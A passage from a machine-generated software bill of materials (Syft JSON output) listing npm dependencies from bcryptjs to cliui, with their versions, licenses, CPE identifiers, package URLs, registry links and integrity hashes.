lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/bcryptjs@2.4.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz","integrity":"sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ==","dependencies":null}},{"id":"983a70fcd42b01da","name":"bidi-js","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/bidi-js@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz","integrity":"sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==","dependencies":{"require-from-string":"^2.0.2"}}},{"id":"0debd0f90c403668","name":"bignumber.js","version":"9.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/bignumber.js@9.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz","integrity":"sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==","dependencies":null}},{"id":"a472eb11fead94f4","name":"binary-extensions","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/binary-extensions@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz","integrity":"sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==","dependencies":null}},{"id":"04b33f5cfaf593a5","name":"body-parser","version":"1.20.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/body-parser@1.20.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz","integrity":"sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA==","dependencies":{"bytes":"~3.1.2","content-type":"~1.0.5","debug":"2.6.9","depd":"2.0.0","destroy":"~1.2.0","http-errors":"~2.0.1","iconv-lite":"~0.4.24","on-finished":"~2.4.1","qs":"~6.15.1","raw-body":"~2.5.3","type-is":"~1.6.18","unpipe":"~1.0.0"}}},{"id":"833f3564230327b0","name":"brace-expansion","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/brace-expansion@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz","integrity":"sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==","dependencies":{"balanced-match":"^1.0.0"}}},{"id":"e8863a3d87ad712b","name":"braces","version":"3.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"},{"cpe":"cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/braces@3.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/braces/-/braces-3.0.3.tgz","integrity":"sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==","dependencies":{"fill-range":"^7.1.1"}}},{"id":"6bc686959e36e164","name":"brotli","version":"1.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/brotli@1.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz","integrity":"sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg==","dependencies":{"base64-js":"^1.1.2"}}},{"id":"adb6ab9adab6e7b8","name":"browserify-zlib","version":"0.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/browserify-zlib@0.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz","integrity":"sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA==","dependencies":{"pako":"~1.0.5"}}},{"id":"4688a05ee871df84","name":"browserslist","version":"4.28.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/browserslist@4.28.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz","integrity":"sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==","dependencies":{"baseline-browser-mapping":"^2.10.12","caniuse-lite":"^1.0.30001782","electron-to-chromium":"^1.5.328","node-releases":"^2.0.36","update-browserslist-db":"^1.2.3"}}},{"id":"ea42e35a908d5ccd","name":"buffer-equal-constant-time","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/buffer-equal-constant-time@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz","integrity":"sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==","dependencies":null}},{"id":"98e22d90241a7628","name":"buffer-from","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/buffer-from@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz","integrity":"sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==","dependencies":null}},{"id":"3009b8237fb85cf0","name":"busboy","version":"1.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/busboy@1.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz","integrity":"sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==","dependencies":{"streamsearch":"^1.1.0"}}},{"id":"f9a24c0655f5cc44","name":"bytes","version":"3.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/bytes@3.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz","integrity":"sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==","dependencies":null}},{"id":"2303cf02934afa6a","name":"call-bind-apply-helpers","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/call-bind-apply-helpers@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz","integrity":"sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==","dependencies":{"es-errors":"^1.3.0","function-bind":"^1.1.2"}}},{"id":"23c8e695a4ffce79","name":"call-bound","version":"1.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/call-bound@1.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz","integrity":"sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==","dependencies":{"call-bind-apply-helpers":"^1.0.2","get-intrinsic":"^1.3.0"}}},{"id":"98453e2c1718f20f","name":"camelcase","version":"5.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/camelcase@5.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz","integrity":"sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==","dependencies":null}},{"id":"b224930ed183bceb","name":"camelcase-css","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/camelcase-css@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz","integrity":"sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==","dependencies":null}},{"id":"574728aff770dffd","name":"caniuse-lite","version":"1.0.30001791","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"CC-BY-4.0","spdxExpression":"CC-BY-4.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/caniuse-lite@1.0.30001791","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz","integrity":"sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==","dependencies":null}},{"id":"e6e064efe5c17d2c","name":"chokidar","version":"3.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/chokidar@3.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz","integrity":"sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==","dependencies":{"anymatch":"~3.1.2","braces":"~3.0.2","glob-parent":"~5.1.2","is-binary-path":"~2.1.0","is-glob":"~4.0.1","normalize-path":"~3.0.0","readdirp":"~3.6.0"}}},{"id":"e7be86c370ee2217","name":"client-only","version":"0.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/client-only@0.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz","integrity":"sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==","dependencies":null}},{"id":"0b1fbe7259e117a1","name":"cliui","version":"6.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cliui@6.0.0","metadataType":"javascrip